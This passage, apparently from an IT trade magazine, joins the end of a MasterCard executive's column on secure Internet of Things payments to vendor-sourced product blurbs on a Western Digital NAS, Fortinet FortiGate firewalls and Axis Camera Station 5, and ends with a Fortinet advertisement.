• User experience is king. With the number of connected devices predicted to grow to 25-50bn by 2025, the IoT will converge and change the consumer experience for the better, improving lives both at home and at work, saving time and keeping you safe and healthy so you can spend time on the things that matter most, like family, friends and passions. Thing-to-thing payments are the future, and we need to accept that they will extend well beyond the mobile devices we consider today. MasterCard is already embracing this concept: we are developing new ways to pay using smart rings, clothing and vehicle key fobs, and our partnership with Samsung to produce the Groceries by MasterCard app, in use on the new Samsung Family Hub fridge, is just the latest example!

• In addition to consumers, for businesses the opportunity is huge! For example, retailers will join their in-store and digital services together for an immersive shopping experience, helping shoppers spend in-store in a similar way to online, with digital signage and point-of-sale systems being personalised and making in-store suggestions based on consumer preferences. To fully take advantage of this market, the IoT needs to be enabled for commerce.

• Security and trust. I’ve said this many times before, but it’s worth repeating: security is our no. 1 priority at MasterCard and should be for all other companies. The growth and success of the IoT hinges on trust, especially when consumers’ money and data are at stake. Every device has to be a secure commerce device; if devices are not secured, consumers won’t tolerate loss of their data or money or, worse yet, will completely abandon participation in the IoT, resorting back to old-school ways. Indeed, MasterCard has done a great job to prepare for this evolution with solutions to secure an IoT payments ecosystem: tokenisation, digital wallets, biometrics, and anomaly detection using data analytics across our network to spot suspicious device and consumer behaviours.

• Sinking or swimming – who will succeed? The magic formula is this: 1) create a positive consumer experience; 2) develop secure products; 3) earn the TRUST of customers; 4) analyse data insights, then use them to solve a problem; 5) give consumers a choice to drive greater adoption.

This was a strong session with global leaders and MasterCard at the table as a leader in payments enabling new solutions around secure payments in the IoT world. The feedback was clear that our leadership is understood and we need to keep enhancing the conversations and directions to enable greater commerce in a secure and trusted fashion.


PRODUCTS

Brand: Western Digital
Product: My Cloud EX2 Ultra

What it does: My Cloud EX2 Ultra is a two-bay network attached storage (NAS) system from Western Digital.

According to WD, the My Cloud EX2 Ultra NAS is designed from the ground up for creative professionals and prosumers who need to automatically sync content across computers, easily share files and folders and enjoy multiple backup options so they can create their own personalised digital library with ease. The device has been upgraded with a 1.3 GHz dual-core processor, giving users faster transfer rates and smooth video streaming.

Users can also attach compatible USB 3.0 hard drives to the USB expansion ports on the My Cloud EX2 Ultra to instantly expand their storage capacity.

What you should know: WD highlights that users also have access to 1 GB of DDR3 memory, allowing them to multitask with ease and leverage applications for HD media streaming, surveillance and much more.

The device has data management and security features in place, giving users the capability to securely manage and protect their documents, photos and other digital files. Drive management options include RAID 0, RAID 1, JBOD and spanning modes, while data protection options include NAS-to-NAS, USB, cloud or LAN/WAN backup.

Brand: Fortinet
Product: FortiGate 400D and 900D NGFW

What it does: According to the security solutions company, the new FortiGate 400D and 900D NGFWs were engineered to deliver high-performance security and are specifically tailored to meet the demands of mid-sized and enterprise organisations today and into the future. Leveraging Fortinet’s FortiASIC-accelerated performance, both appliances utilise Fortinet’s proprietary Network Processor 6 (NP6), providing the FortiGate 400D with throughput performance of 16 Gbps and propelling the FortiGate 900D to speeds of 52 Gbps.

Coupled with the consolidated feature set of the FortiOS operating system, according to Fortinet, the firewalls guarantee improved Intrusion Prevention System (IPS) stream performance, high throughput, broad security, deep inspection, rich analytics, granular controls and ease of use. Reinforced with industry-leading threat intelligence from FortiGuard Labs, the FortiGate 400D and 900D deliver the protection and performance required by mid-sized and enterprise organisations.

What you should know: The FortiGate 900D, according to Fortinet, is designed with the performance and features of an enterprise-grade NGFW. It also has 52 Gbps NGFW performance and multiple 10 Gigabit Ethernet SFP+, SFP and RJ45 ports.

Brand: Axis
Product: Camera Station 5

What it does: Axis Camera Station 5 is a VMS for mid-size installations. Together with the Axis S10 Series of network video recorders and the vendor’s IP products, it offers a video surveillance monitoring and recording solution.

According to Axis, Camera Station 5 features hardware decoding, integration of third-party IP cameras and Axis Optimised Rendering for high-definition identification and smooth video with resolutions up to three 4K video streams.

The new surveillance station has an ‘Operator Mode’, which, according to the company, provides a dedicated interface for efficient operation that meets the requirements of the occasional user as well as the more active user in installations such as larger retail stores, schools and manufacturing facilities.

What you should know: A free mobile viewing app available for Android- and iOS-based mobile devices allows users to view live video from cameras as well as recorded video footage.

The Axis Camera Station 5 also introduces support for hardware decoding and Axis Optimised Rendering. The new ‘Scrubbing’ function allows users to quickly search through video footage from multiple cameras at the same time.


INTELLIGENT, SEAMLESS SECURITY

AND YOU CAN HAVE IT TODAY.

Your attack surface is expanding. Content is multiplying. Threat actors are more cunning. Fortinet delivers a single, seamless network security infrastructure, intelligent enough to defeat attackers and powerful enough to take on tomorrow.


Security Without Compromise
